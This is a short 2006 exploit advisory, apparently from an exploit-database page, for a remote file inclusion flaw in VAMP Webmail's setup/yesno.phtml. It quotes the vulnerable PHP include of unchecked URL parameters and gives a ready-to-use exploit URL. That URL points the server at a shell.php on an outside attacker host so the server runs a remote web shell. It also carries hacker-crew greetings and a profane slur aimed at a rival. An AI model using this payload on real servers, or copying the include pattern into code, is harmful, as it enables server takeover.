VAMP Webmail <= 2.0beta1 (yesno.phtml) Remote Include Vulnerability

2006-09-30 00:00:00

###### ToXiC #########################
#
#VAMP Webmail Remote File Inclusion by ToXiC CreW
#
#BuG FounD by Drago84
#
#Application Affect:VAMP Webmail
#
#Page:
# yesno.phtml
#Dir :
# /setup/
#
#Problem:
# <?if($answer=="Yes") {
# include $yes_url;
# } else {
# include $no_url;
# }?>
# ExPloit :
#http://www.site.com/wamp_dir/setup/yesno.phtml?no_url=http://sonic-banda-di-lamer.gay/shell.php?
#
#
GrEatZ All Member of ToXiC, Str0ke
#
#
#FUCK #Sonic
#
# ToXic Security Italian CreW
###### ToXiC ##########

#

Fixes

No fixes

In order to submit a new fix you need to be registered.